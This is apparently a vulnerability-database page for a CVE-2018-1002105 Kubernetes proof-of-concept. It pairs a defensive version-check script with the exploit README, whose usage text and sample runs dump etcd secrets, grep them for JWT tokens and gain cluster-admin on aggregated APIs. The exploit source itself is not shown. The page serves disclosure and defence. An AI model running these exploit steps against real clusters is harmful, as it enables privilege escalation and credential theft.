
CVE-2018-1002105 PoC — Google Kubernetes permission and access control vulnerability

Associated Vulnerability
Title: Google Kubernetes permission and access control vulnerability (CVE-2018-1002105)
Description: In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.
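A defender-side check derived from the version ranges in the description above, added here as an example and not part of the PoC repository: it classifies a kube-apiserver `gitVersion` string (the field the API server's `/version` endpoint returns) as patched or unpatched against the fixed releases named in the description. The function names and the sample `/version` document are constructed for this example.

```python
"""Classify a kube-apiserver version against the CVE-2018-1002105 fix releases.

Added example, not code from the PoC repository. The fixed releases
(v1.10.11, v1.11.5, v1.12.3) come from the vulnerability description;
function names and sample inputs below are constructed for the demo.
"""
import json
import re

# First release on each affected minor branch that contains the fix.
FIXED_PATCH = {10: 11, 11: 5, 12: 3}

# Accepts gitVersion strings such as "v1.12.2" or "v1.11.5-gke.5+abc123";
# only the leading major.minor.patch triple is used for the comparison.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(git_version):
    """Return (major, minor, patch) parsed from a Kubernetes gitVersion string."""
    m = _VERSION_RE.match(git_version.strip())
    if not m:
        raise ValueError("unrecognised version string: %r" % git_version)
    return tuple(int(x) for x in m.groups())


def is_vulnerable(git_version):
    """True if the version predates the CVE-2018-1002105 fix on its branch."""
    major, minor, patch = parse_version(git_version)
    if major != 1:
        return False  # the description only covers 1.x releases
    if minor < 10:
        # Branches older than 1.10 received no fixed release; all are affected.
        return True
    if minor > 12:
        # Not "prior to" any of the fixed releases, so not in the affected set.
        return False
    return patch < FIXED_PATCH[minor]


def check_version_document(version_json):
    """Evaluate the JSON body returned by GET /version on an API server."""
    doc = json.loads(version_json)
    git_version = doc["gitVersion"]
    return {"gitVersion": git_version, "vulnerable": is_vulnerable(git_version)}


# Constructed sample of a /version response from an unpatched 1.12 API server.
SAMPLE_VERSION_JSON = '{"major": "1", "minor": "12", "gitVersion": "v1.12.2"}'

if __name__ == "__main__":
    print(check_version_document(SAMPLE_VERSION_JSON))
```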
Description
PoC for CVE-2018-1002105.
Readme
# CVE-2018-1002105 PoC

* [Authenticated PoC](#authenticated-poc)
    * [Demo](#demo)
    * [Usage](#usage)
* [Unauthenticated PoC](#unauthenticated-poc)
    * [Demo](#demo-1)
    * [Usage](#usage-1)


## Authenticated PoC
Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires `create` and `get` privileges on `pods` and `pods/exec`. Support has been added for `portforward` and `attach`, which require similar permissions. 

The current PoC dumps the secrets from the default `etcd-kubernetes` pod.

### Demo
The PoC in action:

[![asciicast](https://asciinema.org/a/kubSrehAf14K7MQ9aZw2RpCYd.svg)](https://asciinema.org/a/kubSrehAf14K7MQ9aZw2RpCYd)

### Usage

```bash
usage: poc.py [-h] --target TARGET --jwt TOKEN [--namespace NAMESPACE] --pod
              POD --method {exec,portforward,attach}
              [--privileged-namespace PNAMESPACE] [--privileged-pod PPOD]
              [--container CONTAINER] [--command COMMAND]
              [--filename FILENAME]

PoC for CVE-2018-1002105.

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  --target TARGET, -t TARGET
                        API server target:port
  --jwt TOKEN, -j TOKEN
                        JWT token for service account
  --namespace NAMESPACE, -n NAMESPACE
                        Namespace with method access
  --pod POD, -p POD     Pod with method access
  --method {exec,portforward,attach}, -m {exec,portforward,attach}

optional arguments:
  --privileged-namespace PNAMESPACE, -s PNAMESPACE
                        Target namespace
  --privileged-pod PPOD, -e PPOD
                        Target privileged pod
  --container CONTAINER, -c CONTAINER
                        Target container
  --command COMMAND, -x COMMAND
                        Command to execute
  --filename FILENAME, -f FILENAME
                        File to save output to

```

Example:

```bash
$ ./poc.py -t 10.0.2.15:6443 --jwt [token] -p [pod] -f etcd.out -m attach
[*] Building pipe using attach...
[+] Pipe opened :D
[*] Attempting code exec on etcd-kubernetes/etcd
[*] Writing output to etcd.out ....
[+] Done!
```

Check for tokens:

```bash
$ grep -air eyJ etcd.db
```

## Unauthenticated PoC
The unauthenticated PoC allows privilege escalation within the context of the exposed API. Depending on the functionality of that API, it might be possible to get code execution on pods. This demo currently exploits the bug to gain cluster-admin rights on the `servicecatalog.k8s.io` API. The exploit should also work against `metrics.k8s.io` or any other API exposed through the aggregation layer.

### Demo
The PoC in action:

[![asciicast](https://asciinema.org/a/TjbO5p1JJN0dnNSSWhrcopn9e.svg)](https://asciinema.org/a/TjbO5p1JJN0dnNSSWhrcopn9e)

### Usage

```bash
usage: unauth_poc.py [-h] --target TARGET [--api-base BASE]
                     [--api-target TARGET_API] [--api-version VERSION]
                     [--json] [--filename FILENAME]

Unauthenticated PoC for CVE-2018-1002105

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  --target TARGET, -t TARGET
                        API server target:port
  --api-base BASE, -b BASE
                        Target API name i.e. "servicecatalog.k8s.io"
  --api-target TARGET_API, -u TARGET_API
                        API to access i.e. "clusterservicebrokers"

optional arguments:
  --api-version VERSION, -a VERSION
                        API version to use i.e. "v1beta1"
  --json, -j            Print json output
  --filename FILENAME, -f FILENAME
                        File to save output to
```

Example:

```bash
$ ./unauth_poc.py -t 10.0.2.15:6443 --json -f api.out
[*] Building pipe ...
[+] Pipe opened :D
[*] Attempting to access url
[+] Pipe opened :D
[*] Writing output to api.out ....
[+] Done!

```
File Snapshot

```text
[4.0K] /data/pocs/26b0f5f14a1081cba0018cde99cfb8db48abe560
├── [1.0K] LICENSE
├── [4.4K] poc.py
├── [3.8K] README.md
├── [ 127] stage_1
├── [ 219] stage_2
├── [4.5K] unauth_poc.py
├── [ 151] ustage_1
└── [ 200] ustage_2

0 directories, 8 files
```